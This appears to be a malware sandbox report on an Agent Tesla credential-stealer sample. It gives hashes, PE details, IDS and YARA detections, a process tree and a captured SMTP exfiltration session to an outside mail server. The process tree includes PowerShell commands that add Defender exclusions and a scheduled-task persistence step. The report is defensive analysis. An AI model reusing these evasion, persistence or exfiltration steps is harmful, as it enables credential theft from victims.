                                              MD5:E8CF42736F27344D295F0154E8F51097
                                              SHA1:162FC94FFF43FB35B2612CE4ECFDF1CC1C7A68A1
                                              SHA-256:2ECBED1E01A6404917129A03E0820FBAE016372FADDA8C057603A78A55FECD4C
                                              SHA-512:5EA81E66846390D05FA21DD45A533AC62388587B7315198DF67A7A98D1429E50753610654B0FEC5183AD680D8C08E3C0ECE35C45CE7CD43962065A262FC95E37
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 45%
                                               • Antivirus: Virustotal, Detection: 36%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K.f..............0..2..........:Q... ...`....@.. ....................................@..................................P..O....`............................................................................... ............... ..H............text...X1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............L..............@..B.................Q......H........o...j..........p...xv............................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..(....*..{....*"..}....*...0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.*....0..)........{.........(....t......|......(...+...3.
                                              Process:C:\Users\user\Desktop\DOCUMENTS.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.924525528723306
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:DOCUMENTS.exe
                                              File size:740'864 bytes
                                              MD5:e8cf42736f27344d295f0154e8f51097
                                              SHA1:162fc94fff43fb35b2612ce4ecfdf1cc1c7a68a1
                                              SHA256:2ecbed1e01a6404917129a03e0820fbae016372fadda8c057603a78a55fecd4c
                                              SHA512:5ea81e66846390d05fa21dd45a533ac62388587b7315198df67a7a98d1429e50753610654b0fec5183ad680d8c08e3c0ece35c45ce7cd43962065a262fc95e37
                                              SSDEEP:12288:NGL21IL4BoL2cWjoIRWXcM6CtXx+KWjd1rYQILW4760PVQBmA8URQbXj3kZ3JPAN:sL21ILeoLrARfCJ3WJ1rYHW47ZVQ38XT
                                              TLSH:D1F422497E18AA37CC79A5FA11A15E200277F1482A25EF8F7FD6F54A27E2F009582743
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K.f..............0..2..........:Q... ...`....@.. ....................................@................................
                                              Icon Hash:8a183e06c3aecc5a
                                              Entrypoint:0x4b513a
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x661F4BA4 [Wed Apr 17 04:10:12 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Instruction
                                              jmp dword ptr [00402000h]
                                              push ebx
                                              xor edi, dword ptr [eax]
                                              inc edi
                                              inc edx
                                              inc edi
                                              inc ebx
                                              inc edi
                                              xor al, 46h
                                              inc ecx
                                              cmp dword ptr [eax+56h], ecx
                                              add byte ptr [eax], al
                                              push esi
                                              push ebx
                                              xor eax, 46414750h
                                              xor al, 00h
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb50e8 | 0x4f | .text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb6000 | 0x16f0 | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb8000 | 0xc | .reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x2000 | 0xb3158 | 0xb3200 | 27c1e3a81968ab9168e28fd4d647faff | False | 0.9375776888520586 | data | 7.931627472756141 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc | 0xb6000 | 0x16f0 | 0x1800 | 0aa481c6a1848c9f51b7a92dba4a8300 | False | 0.7967122395833334 | data | 7.178826262537933 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc | 0xb8000 | 0xc | 0x200 | 9b6685d0b9a49fede8ec8fb82c504b61 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                              RT_ICON | 0xb60c8 | 0x12e6 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9218685407193055
                                              RT_GROUP_ICON | 0xb73c0 | 0x14 | data | | | 1.05
                                              RT_VERSION | 0xb73e4 | 0x308 | data | | | 0.4213917525773196

                                              DLL | Import
                                              mscoree.dll | _CorExeMain
                                              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                              04/17/24-15:08:20.936584 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              04/17/24-15:08:20.936584 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              04/17/24-15:08:25.918218 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              04/17/24-15:08:25.918218 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              04/17/24-15:08:25.918218 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              04/17/24-15:08:20.936584 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              04/17/24-15:08:25.917883 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              04/17/24-15:08:20.936511 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              04/17/24-15:08:25.918218 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              04/17/24-15:08:25.917883 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              04/17/24-15:08:20.936584 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              04/17/24-15:08:20.936511 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Apr 17, 2024 15:08:19.020129919 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:19.182723999 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:19.185859919 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:19.743056059 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:19.746567011 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:19.907004118 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:19.907865047 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:20.068360090 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:20.069992065 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:20.271915913 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:20.401052952 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:20.403983116 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:20.564440966 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:20.564486027 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:20.564780951 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:20.765887976 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:20.775387049 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:20.775672913 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:20.935698032 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:20.935909033 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:20.936511040 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:20.936583996 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:20.936625957 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:20.936625957 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:21.096735954 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:21.096890926 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:21.098117113 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:21.185771942 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:24.204127073 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:24.387124062 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:24.550062895 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:24.550432920 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:24.902806997 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:24.903258085 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:25.063210011 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:25.063673973 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:25.223737001 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:25.224668026 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:25.386008024 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:25.386420965 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:25.546331882 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:25.546534061 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:25.747664928 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:25.755858898 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:25.756138086 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:25.915709972 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:25.915926933 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:25.917882919 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:25.918217897 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:25.918217897 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:25.918217897 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:08:26.079622030 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:26.082449913 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:08:26.127131939 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:10:04.408849955 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:10:04.609529972 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:10:04.769905090 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10
                                              Apr 17, 2024 15:10:04.770013094 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:10:04.792691946 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100
                                              Apr 17, 2024 15:10:04.952382088 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10
                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Apr 17, 2024 15:08:18.736186028 CEST | 51590 | 53 | 192.168.2.10 | 1.1.1.1
                                              Apr 17, 2024 15:08:18.958523035 CEST | 53 | 51590 | 1.1.1.1 | 192.168.2.10

                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                              Apr 17, 2024 15:08:18.736186028 CEST | 192.168.2.10 | 1.1.1.1 | 0xba6 | Standard query (0) | mail.thelamalab.com | A (IP address) | IN (0x0001) | false

                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                              Apr 17, 2024 15:08:18.958523035 CEST | 1.1.1.1 | 192.168.2.10 | 0xba6 | No error (0) | mail.thelamalab.com | | 162.222.226.100 | A (IP address) | IN (0x0001) | false
                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                              Apr 17, 2024 15:08:19.743056059 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10 | 220-md-114.webhostbox.net ESMTP Exim 4.96.2 #2 Wed, 17 Apr 2024 18:38:19 +0530
                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                  220 and/or bulk e-mail.
                                              Apr 17, 2024 15:08:19.746567011 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100 | EHLO 390120
                                              Apr 17, 2024 15:08:19.907004118 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10 | 250-md-114.webhostbox.net Hello 390120 [81.181.57.52]
                                                  250-SIZE 52428800
                                                  250-8BITMIME
                                                  250-PIPELINING
                                                  250-PIPECONNECT
                                                  250-AUTH PLAIN LOGIN
                                                  250-STARTTLS
                                                  250 HELP
                                              Apr 17, 2024 15:08:19.907865047 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100 | AUTH login YmlsbGluZ0B0aGVsYW1hbGFiLmNvbQ==
                                              Apr 17, 2024 15:08:20.068360090 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10 | 334 UGFzc3dvcmQ6
                                              Apr 17, 2024 15:08:20.401052952 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10 | 235 Authentication succeeded
                                              Apr 17, 2024 15:08:20.403983116 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100 | MAIL FROM:<billing@thelamalab.com>
                                              Apr 17, 2024 15:08:20.564486027 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10 | 250 OK
                                              Apr 17, 2024 15:08:20.564780951 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100 | RCPT TO:<godwingodwin397@gmail.com>
                                              Apr 17, 2024 15:08:20.775387049 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10 | 250 Accepted
                                              Apr 17, 2024 15:08:20.775672913 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100 | DATA
                                              Apr 17, 2024 15:08:20.935909033 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10 | 354 Enter message, ending with "." on a line by itself
                                              Apr 17, 2024 15:08:20.936625957 CEST | 49708 | 587 | 192.168.2.10 | 162.222.226.100 | .
                                              Apr 17, 2024 15:08:21.098117113 CEST | 587 | 49708 | 162.222.226.100 | 192.168.2.10 | 250 OK id=1rx51Q-0015mQ-2m
                                              Apr 17, 2024 15:08:24.902806997 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10 | 220-md-114.webhostbox.net ESMTP Exim 4.96.2 #2 Wed, 17 Apr 2024 18:38:24 +0530
                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                  220 and/or bulk e-mail.
                                              Apr 17, 2024 15:08:24.903258085 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100 | EHLO 390120
                                              Apr 17, 2024 15:08:25.063210011 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10 | 250-md-114.webhostbox.net Hello 390120 [81.181.57.52]
                                                  250-SIZE 52428800
                                                  250-8BITMIME
                                                  250-PIPELINING
                                                  250-PIPECONNECT
                                                  250-AUTH PLAIN LOGIN
                                                  250-STARTTLS
                                                  250 HELP
                                              Apr 17, 2024 15:08:25.063673973 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100 | AUTH login YmlsbGluZ0B0aGVsYW1hbGFiLmNvbQ==
                                              Apr 17, 2024 15:08:25.223737001 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10 | 334 UGFzc3dvcmQ6
                                              Apr 17, 2024 15:08:25.386008024 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10 | 235 Authentication succeeded
                                              Apr 17, 2024 15:08:25.386420965 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100 | MAIL FROM:<billing@thelamalab.com>
                                              Apr 17, 2024 15:08:25.546331882 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10 | 250 OK
                                              Apr 17, 2024 15:08:25.546534061 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100 | RCPT TO:<godwingodwin397@gmail.com>
                                              Apr 17, 2024 15:08:25.755858898 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10 | 250 Accepted
                                              Apr 17, 2024 15:08:25.756138086 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100 | DATA
                                              Apr 17, 2024 15:08:25.915926933 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10 | 354 Enter message, ending with "." on a line by itself
                                              Apr 17, 2024 15:08:25.918217897 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100 | .
                                              Apr 17, 2024 15:08:26.082449913 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10 | 250 OK id=1rx51V-0015r7-2i
                                              Apr 17, 2024 15:10:04.408849955 CEST | 49710 | 587 | 192.168.2.10 | 162.222.226.100 | QUIT
                                              Apr 17, 2024 15:10:04.769905090 CEST | 587 | 49710 | 162.222.226.100 | 192.168.2.10 | 221 md-114.webhostbox.net closing connection

                                              Target ID:1
                                              Start time:15:08:11
                                              Start date:17/04/2024
                                              Path:C:\Users\user\Desktop\DOCUMENTS.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\DOCUMENTS.exe"
                                              Imagebase:0x740000
                                              File size:740'864 bytes
                                              MD5 hash:E8CF42736F27344D295F0154E8F51097
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1359470128.0000000004A7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.1359470128.0000000004A7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              Target ID:6
                                              Start time:15:08:15
                                              Start date:17/04/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DOCUMENTS.exe"
                                              Imagebase:0x2a0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:7
                                              Start time:15:08:15
                                              Start date:17/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:8
                                              Start time:15:08:15
                                              Start date:17/04/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe"
                                              Imagebase:0x2a0000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:9
                                              Start time:15:08:15
                                              Start date:17/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:10
                                              Start time:15:08:15
                                              Start date:17/04/2024
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bgURAojpNNIb" /XML "C:\Users\user\AppData\Local\Temp\tmp1DED.tmp"
                                              Imagebase:0x900000
                                              File size:187'904 bytes
                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:11
                                              Start time:15:08:15
                                              Start date:17/04/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff620390000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:12
                                              Start time:15:08:16
                                              Start date:17/04/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                              Imagebase:0x90000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:13
                                              Start time:15:08:16
                                              Start date:17/04/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                              Imagebase:0xe90000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1395584296.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1395584296.00000000030A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1393894903.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1393894903.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1395584296.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1395584296.0000000003051000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              Target ID:14
                                              Start time:15:08:17
                                              Start date:17/04/2024
                                              Path:C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\bgURAojpNNIb.exe
                                              Imagebase:0x7d0000
                                              File size:740'864 bytes
                                              MD5 hash:E8CF42736F27344D295F0154E8F51097
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.1418243148.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.1418243148.0000000003B9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 45%, ReversingLabs
                                              • Detection: 36%, Virustotal
                                              Reputation:low
                                              Has exited:true

                                              Target ID:15
                                              Start time:15:08:18
                                              Start date:17/04/2024
